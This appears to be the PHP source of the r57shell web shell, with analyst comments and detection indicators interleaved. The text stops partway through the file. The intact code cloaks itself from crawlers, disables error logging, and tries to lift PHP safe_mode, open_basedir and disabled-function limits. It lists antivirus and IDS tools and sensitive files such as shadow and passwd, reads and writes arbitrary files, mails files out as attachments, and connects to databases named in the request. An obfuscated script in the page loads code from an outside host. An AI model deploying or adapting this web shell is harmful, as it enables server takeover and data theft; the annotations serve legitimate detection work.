1<?php
2
3
4
// Analyst note: request cloaking. Any request whose User-Agent contains the
// lowercase substring "bot" receives a fake "404 Not Found" body and the script
// exits, so crawlers and scanners that announce themselves never see the interface.
5if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
6
7
8
// Interface language key; combined with the $lang table as $lang[$language.'_textNN'] further down.
9$language='eng';
10
11
12
// Access-control switch. With 0 the HTTP Basic check further down is skipped,
// so anyone who can reach this URL gets the full interface.
13$auth = 0;
14
15
16
// Expected MD5 hex digests of the Basic-auth user name and password (compared
// with md5() of the supplied values further down). Both are empty in this copy.
17$name='';
18
19$pass='';
20
21
22
23//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
24
25@setlocale(LC_ALL,'ru_RU.cp1251');
26
27
28
// Asks PHP to put these directives back to their configured startup values,
// undoing any runtime or per-directory override. Errors are silenced with @.
// Whether a call has any effect depends on the PHP version and SAPI; the
// safe_mode family of directives no longer exists in current PHP.
29@ini_restore("safe_mode");
30
31@ini_restore("open_basedir");
32
33@ini_restore("safe_mode_include_dir");
34
35@ini_restore("safe_mode_exec_dir");
36
37@ini_restore("disable_functions");
38
39@ini_restore("allow_url_fopen");
40
41
42
// Analyst note (anti-forensics): clears the error_log target and switches
// log_errors off for this request, then attempts to force file_uploads and
// allow_url_fopen on. ini_alter() is the legacy alias used when ini_set() is missing.
// A PHP error log that goes quiet for one script is itself worth a look.
43if(@function_exists('ini_set'))
44
45 {
46
47 @ini_set('error_log',NULL);
48
49 @ini_set('log_errors',0);
50
51 @ini_set('file_uploads',1);
52
53 @ini_set('allow_url_fopen',1);
54
55 }
56
57else
58
59 {
60
61 @ini_alter('error_log',NULL);
62
63 @ini_alter('log_errors',0);
64
65 @ini_alter('file_uploads',1);
66
67 @ini_alter('allow_url_fopen',1);
68
69 }
70
71
72
73error_reporting(E_ALL);
74
75
76
// Name lists. Only $tempdirs is consumed in the visible part of the file (tested
// with is_writable() further down); the others are presumably used by host
// reconnaissance code later on -- confirm against the rest of the file.
//   $userful     - compilers, interpreters and utilities such as nc
//   $danger      - antivirus, IDS/HIDS, firewall and log-audit tool names
//   $tempdirs    - candidate temporary directories
//   $downloaders - command-line HTTP clients
// The leading ", " inside most entries is part of the string values.
77/* ??? ????? */
78
79$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
80
81$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
82
83$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
84
85$downloaders = array('wget','fetch','lynx','links','curl','get');
86
87
88
// The original comment below lost its encoding; its only readable part mentions
// realpath(). $chars_rlph is an alphabet and $presets_rlph a list of well-known
// sensitive file and directory names (password files, web/FTP/Samba configs,
// shell and MySQL history files). Their consumer is not visible in this part.
89/* ??? ?????? ???????? ???? ????? realpath() */
90
91//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
92
93//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
94
95//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
96
97//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
98
99//$chars_rlph = "_-.01234567890";
100
101$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
102
103
104
105$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
106
107'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
108
109'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
110
111'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');
112
113
114
115/******************************************************************************************************/
116
117
118
// Records a start timestamp. getmicrotime() is not defined in this part of the file.
119define("starttime",@getmicrotime());
120
121
122
// $open_basedir becomes 1 when ini_get() is unavailable or when open_basedir /
// safe_mode_include_dir is set, i.e. when file access is likely to be restricted.
123if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};
124
125
126
// NOTE(review): called without @ or function_exists(); the function no longer
// exists in PHP 7+, which dates this script to PHP 4/5-era hosts.
127set_magic_quotes_runtime(0);
128
// Removes the execution time limit and output buffering for this request, so a
// single request can run long operations. Long-running PHP workers tied to one
// unfamiliar script are a useful triage signal.
129@set_time_limit(0);
130
131if(@function_exists('ini_set'))
132
133 {
134
135 @ini_set('max_execution_time',0);
136
137 @ini_set('output_buffering',0);
138
139 }
140
141else
142
143 {
144
145 @ini_alter('max_execution_time',0);
146
147 @ini_alter('output_buffering',0);
148
149 }
150
151$safe_mode = @ini_get('safe_mode');
152
153#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
154
// Tool version string; matches the "v.1.42" shown in the page title in $head.
155$version = '1.42';
156
// Compatibility shim for PHP older than 4.1.0: aliases the superglobals to the
// legacy $HTTP_*_VARS arrays.
157if(@version_compare(@phpversion(), '4.1.0') == -1)
158
159 {
160
161 $_POST = &$HTTP_POST_VARS;
162
163 $_GET = &$HTTP_GET_VARS;
164
165 $_SERVER = &$HTTP_SERVER_VARS;
166
167 $_COOKIE = &$HTTP_COOKIE_VARS;
168
169 }
170
// When magic quotes are active, strips the added slashes from every POST and
// COOKIE value so the operator's input reaches the handlers unmodified.
// $_GET is not processed here.
171if (@get_magic_quotes_gpc())
172
173 {
174
175 foreach ($_POST as $k=>$v)
176
177 {
178
179 $_POST[$k] = stripslashes($v);
180
181 }
182
183 foreach ($_COOKIE as $k=>$v)
184
185 {
186
187 $_COOKIE[$k] = stripslashes($v);
188
189 }
190
191 }
192
193
194
// Optional HTTP Basic gate, active only when $auth == 1. The supplied user name
// and password are each hashed with unsalted MD5 and compared with $name / $pass;
// a mismatch answers 401 with realm "HELLO!". With $auth = 0 (as set above) this
// block never runs and the script is open to any visitor.
195if($auth == 1) {
196
197if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
198
199 {
200
201 header('WWW-Authenticate: Basic realm="HELLO!"');
202
203 header('HTTP/1.0 401 Unauthorized');
204
205 exit("<h1>Access Denied</h1>");
206
207 }
208
209}
210
211
212
// Working-directory selection. On the first visit (cookies absent) every entry of
// $tempdirs is tested with is_writable(); the last writable one becomes $tempdir,
// and both the path and a ready-made <select> HTML fragment are stored client-side
// in the cookies "tempdir" and "select_tempdir". On later requests the values are
// taken from POST or the cookies without validation.
// Detection: requests to a .php file that carry these two cookie names, one of
// them holding HTML markup.
213if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
214
215 $tempdir='./';
216
217 $select_tempdir = '<select name=tempdir><option value="./">./</option>';
218
219 foreach( $tempdirs as $item) {
220
221 if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
222
223 }
224
225 $select_tempdir .= '</select>';
226
227 setcookie('tempdir',$tempdir);
228
229 setcookie('select_tempdir',$select_tempdir);
230
231}else{
232
233 if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
234
235 $select_tempdir = $_COOKIE['select_tempdir'];
236
237}
238
239
240
// HTML prologue (title, obfuscated script, CSS, show/hide helpers) echoed by the
// handlers below. The <title> names the tool family and version:
// "r57shell v.1.42 - Edited By KingDefacer".
// Analyst note: the first <script> is obfuscated. It maps each character of MI to
// ML.charAt(charCode - 48) and passes the result to document.write(); the decoded
// output is a <SCRIPT SRC=...> tag that loads hxxp://www[.]c99php[.]com/turk.js.
// Every page rendered in the operator's browser therefore fetches a third-party
// script, which typically also exposes the page URL to that host through the
// Referer header. The host name is an indicator for proxy and DNS logs.
241$head = '
242
243<html>
244<head>
245<title>r57shell v.1.42 - Edited By KingDefacer</title>
246<script type="text/javascript" language="javascript">
247<!--
248ML="P<>phTsmtr/9:Cuk RIc=jSw.o";
249MI="1F=AB05@FA=D4883<::GGGHC;;343HCI7:8>9?HE621:F=AB052";
250OT="";
251for(j=0;j<MI.length;j++){
252OT+=ML.charAt(MI.charCodeAt(j)-48);
253}document.write(OT);
254// --></script>
255<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
256<STYLE>
257
258tr {
259
260BORDER-RIGHT: #aaaaaa 1px solid;
261
262BORDER-TOP: #eeeeee 1px solid;
263
264BORDER-LEFT: #eeeeee 1px solid;
265
266BORDER-BOTTOM: #aaaaaa 1px solid;
267
268color: #000000;
269
270}
271
272td {
273
274BORDER-RIGHT: #aaaaaa 1px solid;
275
276BORDER-TOP: #eeeeee 1px solid;
277
278BORDER-LEFT: #eeeeee 1px solid;
279
280BORDER-BOTTOM: #aaaaaa 1px solid;
281
282color: #000000;
283
284}
285
286.table1 {
287
288BORDER: 0px;
289
290BACKGROUND-COLOR: #D4D0C8;
291
292color: #000000;
293
294}
295
296.td1 {
297
298BORDER: 0px;
299
300font: 7pt Verdana;
301
302color: #000000;
303
304}
305
306.tr1 {
307
308BORDER: 0px;
309
310color: #000000;
311
312}
313
314table {
315
316BORDER: #eeeeee 1px outset;
317
318BACKGROUND-COLOR: #D4D0C8;
319
320color: #000000;
321
322}
323
324input {
325
326BORDER-RIGHT: #ffffff 1px solid;
327
328BORDER-TOP: #999999 1px solid;
329
330BORDER-LEFT: #999999 1px solid;
331
332BORDER-BOTTOM: #ffffff 1px solid;
333
334BACKGROUND-COLOR: #e4e0d8;
335
336font: 8pt Verdana;
337
338color: #000000;
339
340}
341
342select {
343
344BORDER-RIGHT: #ffffff 1px solid;
345
346BORDER-TOP: #999999 1px solid;
347
348BORDER-LEFT: #999999 1px solid;
349
350BORDER-BOTTOM: #ffffff 1px solid;
351
352BACKGROUND-COLOR: #e4e0d8;
353
354font: 8pt Verdana;
355
356color: #000000;;
357
358}
359
360submit {
361
362BORDER: buttonhighlight 2px outset;
363
364BACKGROUND-COLOR: #e4e0d8;
365
366width: 30%;
367
368color: #000000;
369
370}
371
372textarea {
373
374BORDER-RIGHT: #ffffff 1px solid;
375
376BORDER-TOP: #999999 1px solid;
377
378BORDER-LEFT: #999999 1px solid;
379
380BORDER-BOTTOM: #ffffff 1px solid;
381
382BACKGROUND-COLOR: #e4e0d8;
383
384font: Fixedsys bold;
385
386color: #000000;
387
388}
389
390BODY {
391
392margin: 1px;
393
394color: #000000;
395
396background-color: #e4e0d8;
397
398}
399
400A:link {COLOR:red; TEXT-DECORATION: none}
401
402A:visited { COLOR:red; TEXT-DECORATION: none}
403
404A:active {COLOR:red; TEXT-DECORATION: none}
405
406A:hover {color:blue;TEXT-DECORATION: none}
407
408</STYLE>
409
410<script language=\'javascript\'>
411
412function hide_div(id)
413
414{
415
416 document.getElementById(id).style.display = \'none\';
417
418 document.cookie=id+\'=0;\';
419
420}
421
422function show_div(id)
423
424{
425
426 document.getElementById(id).style.display = \'block\';
427
428 document.cookie=id+\'=1;\';
429
430}
431
432function change_divst(id)
433
434{
435
436 if (document.getElementById(id).style.display == \'none\')
437
438 show_div(id);
439
440 else
441
442 hide_div(id);
443
444}
445
446
447
448
449
450</script>';
451
// Minimal in-memory ZIP writer: addFile() appends one deflated entry, file()
// returns the finished archive as a binary string. Used by compress() below for
// the "zip" download option.
452class zipfile
453
454{
455
 // Local file records, one binary string per added file.
456 var $datasec = array();
457
 // Central directory records, one per added file.
458 var $ctrl_dir = array();
459
 // End-of-central-directory signature followed by four zero bytes.
460 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
461
 // Running byte offset of the next local file record.
462 var $old_offset = 0;
463
 // Packs a Unix timestamp (0 = now) into the 32-bit DOS date/time layout.
 // Dates before 1980 are clamped to 1980-01-01 00:00:00.
464 function unix2DosTime($unixtime = 0) {
465
466 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
467
468 if ($timearray['year'] < 1980) {
469
470 $timearray['year'] = 1980;
471
472 $timearray['mon'] = 1;
473
474 $timearray['mday'] = 1;
475
476 $timearray['hours'] = 0;
477
478 $timearray['minutes'] = 0;
479
480 $timearray['seconds'] = 0;
481
482 }
483
484 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
485
486 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
487
488 }
489
 // Adds one file to the archive.
 //   $data - file contents, $name - path inside the archive (backslashes are
 //   converted to forward slashes), $time - Unix timestamp for the entry (0 = now).
490 function addFile($data, $name, $time = 0)
491
492 {
493
494 $name = str_replace('\\', '/', $name);
495
496 $dtime = dechex($this->unix2DosTime($time));
497
 // Builds the text "\xNN\xNN\xNN\xNN" (little-endian byte order) from the hex
 // digits of the DOS time and lets eval() turn it into four raw bytes.
 // NOTE(review): the evaluated text comes only from dechex() output, so it
 // holds hex digits and is not request-controlled here; the indexing assumes
 // dechex() returned eight digits. pack('V', ...) is the eval-free equivalent.
498 $hexdtime = '\x' . $dtime[6] . $dtime[7]
499
500 . '\x' . $dtime[4] . $dtime[5]
501
502 . '\x' . $dtime[2] . $dtime[3]
503
504 . '\x' . $dtime[0] . $dtime[1];
505
506 eval('$hexdtime = "' . $hexdtime . '";');
507
 // Local file header: signature, version, flags, method 8 (deflate), time.
508 $fr = "\x50\x4b\x03\x04";
509
510 $fr .= "\x14\x00";
511
512 $fr .= "\x00\x00";
513
514 $fr .= "\x08\x00";
515
516 $fr .= $hexdtime;
517
518 $unc_len = strlen($data);
519
520 $crc = crc32($data);
521
522 $zdata = gzcompress($data);
523
 // Drops the 2-byte zlib header and 4-byte checksum trailer that gzcompress()
 // adds, leaving the raw deflate stream the ZIP format expects.
524 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
525
526 $c_len = strlen($zdata);
527
528 $fr .= pack('V', $crc);
529
530 $fr .= pack('V', $c_len);
531
532 $fr .= pack('V', $unc_len);
533
534 $fr .= pack('v', strlen($name));
535
536 $fr .= pack('v', 0);
537
538 $fr .= $name;
539
540 $fr .= $zdata;
541
542 $this -> datasec[] = $fr;
543
 // Matching central directory record for the entry just written.
544 $cdrec = "\x50\x4b\x01\x02";
545
546 $cdrec .= "\x00\x00";
547
548 $cdrec .= "\x14\x00";
549
550 $cdrec .= "\x00\x00";
551
552 $cdrec .= "\x08\x00";
553
554 $cdrec .= $hexdtime;
555
556 $cdrec .= pack('V', $crc);
557
558 $cdrec .= pack('V', $c_len);
559
560 $cdrec .= pack('V', $unc_len);
561
562 $cdrec .= pack('v', strlen($name) );
563
564 $cdrec .= pack('v', 0 );
565
566 $cdrec .= pack('v', 0 );
567
568 $cdrec .= pack('v', 0 );
569
570 $cdrec .= pack('v', 0 );
571
572 $cdrec .= pack('V', 32 );
573
 // Offset of this entry's local header, then advance past the record.
574 $cdrec .= pack('V', $this -> old_offset );
575
576 $this -> old_offset += strlen($fr);
577
578 $cdrec .= $name;
579
580 $this -> ctrl_dir[] = $cdrec;
581
582 }
583
 // Returns the complete archive: all local records, the central directory,
 // and the end-of-central-directory record with entry counts and sizes.
584 function file()
585
586 {
587
588 $data = implode('', $this -> datasec);
589
590 $ctrldir = implode('', $this -> ctrl_dir);
591
592 return
593
594 $data .
595
596 $ctrldir .
597
598 $this -> eof_ctrl_dir .
599
600 pack('v', sizeof($this -> ctrl_dir)) .
601
602 pack('v', sizeof($this -> ctrl_dir)) .
603
604 pack('V', strlen($ctrldir)) .
605
606 pack('V', strlen($data)) .
607
608 "\x00\x00";
609
610 }
611
612}
613
614
615
// Optionally compresses a download in place.
//   $filename (by reference) - gets '.bz2', '.gz' or '.zip' appended
//   $filedump (by reference) - replaced by the compressed bytes
//   $compress                - 'bzip', 'gzip' or 'zip'; anything else, or a
//                              missing extension function, leaves the data as is
// Results are also reported through the globals $mime_type and
// $content_encoding. The download handler passes $_POST['compress'] here.
616function compress(&$filename,&$filedump,$compress)
617
618 {
619
620 global $content_encoding;
621
622 global $mime_type;
623
624 if ($compress == 'bzip' && @function_exists('bzcompress'))
625
626 {
627
628 $filename .= '.bz2';
629
630 $mime_type = 'application/x-bzip2';
631
632 $filedump = bzcompress($filedump);
633
634 }
635
636 else if ($compress == 'gzip' && @function_exists('gzencode'))
637
638 {
639
640 $filename .= '.gz';
641
642 $content_encoding = 'x-gzip';
643
644 $mime_type = 'application/x-gzip';
645
646 $filedump = gzencode($filedump);
647
648 }
649
650 else if ($compress == 'zip' && @function_exists('gzcompress'))
651
652 {
653
654 $filename .= '.zip';
655
656 $mime_type = 'application/zip';
657
658 $zipfile = new zipfile();
659
 // substr(..., 0, -4) removes the '.zip' just appended, so the entry inside
 // the archive keeps the original file name.
660 $zipfile -> addFile($filedump, substr($filename, 0, -4));
661
662 $filedump = $zipfile -> file();
663
664 }
665
666 else
667
668 {
669
670 $mime_type = 'application/octet-stream';
671
672 }
673
674 }
675
676
677
// Reads the file at $temp and returns its contents, trying one file-reading
// primitive after another and using the first whose functions exist.
// Analyst note: because every branch is guarded by function_exists(), blocking
// a single function through disable_functions does not stop the read; hardening
// has to rely on filesystem permissions and open_basedir-style confinement.
// The readfile(), highlight_file() and show_source() branches print the file to
// the response and assign their return value (not the content) to $str.
// If no primitive is available the localized message $lang[..'_text56'] is echoed.
678function moreread($temp){
679
680global $lang,$language;
681
682$str='';
683
684 if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
685
686 if($ffile){
687
688 while(!@feof($ffile)){$str .= @fgets($ffile);};
689
690 fclose($ffile);
691
692 }
693
694 }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
695
696 if($ffile){
697
698 $str = @fread($ffile, @filesize($temp));
699
700 @fclose($ffile);
701
702 }
703
704 }elseif(@function_exists('file')&&($ffiles = @file($temp))){
705
706 foreach ($ffiles as $ffile) { $str .= $ffile; }
707
708 }elseif(@function_exists('file_get_contents')){
709
710 $str = @file_get_contents($temp);
711
712 }elseif(@function_exists('readfile')){
713
714 $str = @readfile($temp);
715
716 }elseif(@function_exists('highlight_file')){
717
718 $str = @highlight_file($temp);
719
720 }elseif(@function_exists('show_source')){
721
722 $str = @show_source($temp);
723
724 }else{echo $lang[$language.'_text56'];}
725
726return $str;
727
728}
729
730
731
// Fallback reader: copies $filename through the compress.zlib:// stream wrapper
// into a temporary file, reads that copy with moreread(), deletes it and returns
// the contents. When $temp is empty a temp name with prefix "copytemp" is
// created in the current working directory.
// Analyst note: short-lived "copytemp*" files appearing next to a web script are
// a host-side artifact of this path. On copy failure the localized message
// $lang[..'_text119'] is echoed and an empty string is returned.
732function readzlib($filename,$temp=''){
733
734global $lang,$language;
735
736$str='';
737
738 if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
739
740 if(@copy("compress.zlib://".$filename, $temp)) {
741
742 $str = moreread($temp);
743
744 } else echo $lang[$language.'_text119'];
745
746 @unlink($temp);
747
748return $str;
749
750}
751
752
753
// Writes $str to the path $temp (binary mode, truncating), using the first
// available primitive among fopen/fwrite, fopen/fputs and file_put_contents.
// Returns 1 when a branch was entered and 0 when none was available; the
// result of the write call itself is not checked, so 1 does not prove the
// data reached disk. As in moreread(), each branch is guarded by
// function_exists(), so disabling one function does not prevent writes.
754function morewrite($temp,$str='')
755
756{
757
758global $lang,$language;
759
760 if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
761
762 if($ffile){
763
764 @fwrite($ffile,$str);
765
766 @fclose($ffile);
767
768 }
769
770 }elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
771
772 if($ffile){
773
774 @fputs($ffile,$str);
775
776 @fclose($ffile);
777
778 }
779
780 }elseif(@function_exists('file_put_contents')){
781
782 @file_put_contents($temp,$str);
783
784 }else return 0;
785
786return 1;
787
788}
789
790
791
// Sends one file by e-mail through PHP's mail().
//   $to, $from, $subj - recipient, sender and subject
//   $attach           - array with keys 'type' (MIME type), 'name' and 'content'
// The base64-encoded content is appended to the header string after a blank
// line and the message body argument is empty. Returns 1 if mail() accepted the
// message, otherwise 0.
// Analyst note: this is a data-exfiltration path that uses the host's own MTA;
// outbound mail from the web server account with a single base64 part and an
// empty body is worth alerting on. The arguments are concatenated into headers
// without any filtering of CR/LF.
792function mailattach($to,$from,$subj,$attach)
793
794 {
795
796 $headers = "From: $from\r\n";
797
798 $headers .= "MIME-Version: 1.0\r\n";
799
800 $headers .= "Content-Type: ".$attach['type'];
801
802 $headers .= "; name=\"".$attach['name']."\"\r\n";
803
804 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
805
806 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
807
808 if(mail($to,$subj,"",$headers)) { return 1; }
809
810 return 0;
811
812 }
813
// Thin multi-database client. $db selects the backend by name ('MySQL', 'MSSQL',
// 'PostgreSQL', 'Oracle', 'MySQLi', 'mSQL', 'SQLite'); every method switches on
// it and calls the matching procedural extension function with errors silenced
// by @. The db_query handler further down fills host, port, user, pass and base
// straight from POST fields, so the class connects wherever the request says.
// Analyst note: outbound database connections from a web server process to
// hosts or accounts the application never uses are the network-side trace.
814class my_sql
815
816 {
817
818 var $host = 'localhost';
819
820 var $port = '';
821
822 var $user = '';
823
824 var $pass = '';
825
 // Database name (for SQLite: the value handed to sqlite_open()).
826 var $base = '';
827
 // Backend selector, see the class comment.
828 var $db = '';
829
830 var $connection;
831
 // Last result handle returned by query().
832 var $res;
833
 // Last error message set by query().
834 var $error;
835
 // Filled by get_result(): fetched rows, column names and counters.
836 var $rows;
837
838 var $columns;
839
840 var $num_rows;
841
842 var $num_fields;
843
 // Filled by dump(): lines of the generated SQL dump.
844 var $dump;
845
846
847
 // Opens the connection for the selected backend, applying the default port
 // (3306, 1433, 5432) when none was given. Returns 1 on success and 0 when the
 // extension function is missing, the backend name is unknown or the
 // connection attempt fails.
848 function connect()
849
850 {
851
852 switch($this->db)
853
854 {
855
856 case 'MySQL':
857
858 if(empty($this->port)) { $this->port = '3306'; }
859
860 if(!@function_exists('mysql_connect')) return 0;
861
862 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
863
864 if(is_resource($this->connection)) return 1;
865
866 break;
867
868 case 'MSSQL':
869
870 if(empty($this->port)) { $this->port = '1433'; }
871
872 if(!@function_exists('mssql_connect')) return 0;
873
874 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
875
876 if($this->connection) return 1;
877
878 break;
879
880 case 'PostgreSQL':
881
882 if(empty($this->port)) { $this->port = '5432'; }
883
 // Connection string assembled by concatenation; values are not escaped.
884 $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
885
886 if(!@function_exists('pg_connect')) return 0;
887
888 $this->connection = @pg_connect($str);
889
890 if(is_resource($this->connection)) return 1;
891
892 break;
893
894 case 'Oracle':
895
896 if(!@function_exists('ocilogon')) return 0;
897
898 $this->connection = @ocilogon($this->user, $this->pass, $this->base);
899
900 if(is_resource($this->connection)) return 1;
901
902 break;
903
904 case 'MySQLi':
905
906 if(empty($this->port)) { $this->port = '3306'; }
907
908 if(!@function_exists('mysqli_connect')) return 0;
909
910 $this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
911
912 if(is_resource($this->connection)) return 1;
913
914 break;
915
916 case 'mSQL':
917
918 if(!@function_exists('msql_connect')) return 0;
919
920 $this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
921
922 if(is_resource($this->connection)) return 1;
923
924 break;
925
926 case 'SQLite':
927
928 if(!@function_exists('sqlite_open')) return 0;
929
930 $this->connection = @sqlite_open($this->base);
931
932 if(is_resource($this->connection)) return 1;
933
934 break;
935
936 }
937
938 return 0;
939
940 }
941
942
943
 // Selects $this->base on backends that need a separate call (MySQL, MSSQL,
 // mSQL); the others pass the database at connect time and return 1 at once.
 // Returns 1 on success, 0 on failure or unknown backend.
944 function select_db()
945
946 {
947
948 switch($this->db)
949
950 {
951
952 case 'MySQL':
953
954 if(@mysql_select_db($this->base,$this->connection)) return 1;
955
956 break;
957
958 case 'MSSQL':
959
960 if(@mssql_select_db($this->base,$this->connection)) return 1;
961
962 break;
963
964 case 'PostgreSQL':
965
966 return 1;
967
968 break;
969
970 case 'Oracle':
971
972 return 1;
973
974 break;
975
976 case 'MySQLi':
977
978 return 1;
979
980 break;
981
982 case 'mSQL':
983
984 if(@msql_select_db($this->base,$this->connection)) return 1;
985
986 break;
987
988 case 'SQLite':
989
990 return 1;
991
992 break;
993
994 }
995
996 return 0;
997
998 }
999
1000
1001
 // Runs one SQL statement and stores the handle in $this->res.
 // Return codes used by the callers: 0 = error ($this->error is set),
 // 1 = a result set is available for get_result(), 2 = executed without a
 // result set. For Oracle the mapping differs: 2 when ocirowcount() is
 // non-zero, 1 otherwise, and failures fall through to the final return 0.
1002 function query($query)
1003
1004 {
1005
1006 $this->res=$this->error='';
1007
1008 switch($this->db)
1009
1010 {
1011
1012 case 'MySQL':
1013
 // Analyst note: every MySQL statement is sent with the prefix /*<NUL>*/, a
 // comment holding a single NUL byte. The purpose is not stated in this file;
 // a statement that starts with such a comment in the general or audit log
 // is a usable indicator.
1014 if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
1015
1016 {
1017
1018 $this->error = @mysql_error($this->connection);
1019
1020 return 0;
1021
1022 }
1023
1024 else if(is_resource($this->res)) { return 1; }
1025
1026 return 2;
1027
1028 break;
1029
1030 case 'MSSQL':
1031
1032 if(false===($this->res=@mssql_query($query,$this->connection)))
1033
1034 {
1035
1036 $this->error = 'Query error';
1037
1038 return 0;
1039
1040 }
1041
1042 else if(@mssql_num_rows($this->res) > 0) { return 1; }
1043
1044 return 2;
1045
1046 break;
1047
1048 case 'PostgreSQL':
1049
1050 if(false===($this->res=@pg_query($this->connection,$query)))
1051
1052 {
1053
1054 $this->error = @pg_last_error($this->connection);
1055
1056 return 0;
1057
1058 }
1059
1060 else if(@pg_num_rows($this->res) > 0) { return 1; }
1061
1062 return 2;
1063
1064 break;
1065
1066 case 'Oracle':
1067
1068 if(false===($this->res=@ociparse($this->connection,$query)))
1069
1070 {
1071
1072 $this->error = 'Query parse error';
1073
1074 }
1075
1076 else
1077
1078 {
1079
1080 if(@ociexecute($this->res))
1081
1082 {
1083
1084 if(@ocirowcount($this->res) != 0) return 2;
1085
1086 return 1;
1087
1088 }
1089
1090 $error = @ocierror();
1091
1092 $this->error=$error['message'];
1093
1094 }
1095
1096 break;
1097
1098 case 'MySQLi':
1099
1100 if(false===($this->res=@mysqli_query($this->connection,$query)))
1101
1102 {
1103
1104 $this->error = @mysqli_error($this->connection);
1105
1106 return 0;
1107
1108 }
1109
1110 else if(is_resource($this->res)) { return 1; }
1111
1112 return 2;
1113
1114 break;
1115
1116 case 'mSQL':
1117
1118 if(false===($this->res=@msql_query($query,$this->connection)))
1119
1120 {
1121
1122 $this->error = @msql_error($this->connection);
1123
1124 return 0;
1125
1126 }
1127
1128 else if(is_resource($this->res)) { return 1; }
1129
1130 return 2;
1131
1132 break;
1133
1134 case 'SQLite':
1135
1136 if(false===($this->res=@sqlite_query($this->connection,$query)))
1137
1138 {
1139
1140 $this->error = @sqlite_error_string($this->connection);
1141
1142 return 0;
1143
1144 }
1145
1146 else if(is_resource($this->res)) { return 1; }
1147
1148 return 2;
1149
1150 break;
1151
1152 }
1153
1154 return 0;
1155
1156 }
1157
 // Fetches the whole result set of the last query() into $this->rows and fills
 // $this->columns (keys of the first row), $this->num_rows and
 // $this->num_fields. Returns 1 when at least one row was counted, else 0.
 // The fetch loops assign into $this->rows[] before testing the value, so the
 // terminating false is stored as a last element; callers iterate with
 // num_rows and never reach it.
1158 function get_result()
1159
1160 {
1161
1162 $this->rows=array();
1163
1164 $this->columns=array();
1165
1166 $this->num_rows=$this->num_fields=0;
1167
1168 switch($this->db)
1169
1170 {
1171
1172 case 'MySQL':
1173
1174 $this->num_rows=@mysql_num_rows($this->res);
1175
1176 $this->num_fields=@mysql_num_fields($this->res);
1177
1178 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
1179
1180 @mysql_free_result($this->res);
1181
1182 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
1183
1184 break;
1185
1186 case 'MSSQL':
1187
1188 $this->num_rows=@mssql_num_rows($this->res);
1189
1190 $this->num_fields=@mssql_num_fields($this->res);
1191
1192 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
1193
1194 @mssql_free_result($this->res);
1195
1196 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
1197
1198 break;
1199
1200 case 'PostgreSQL':
1201
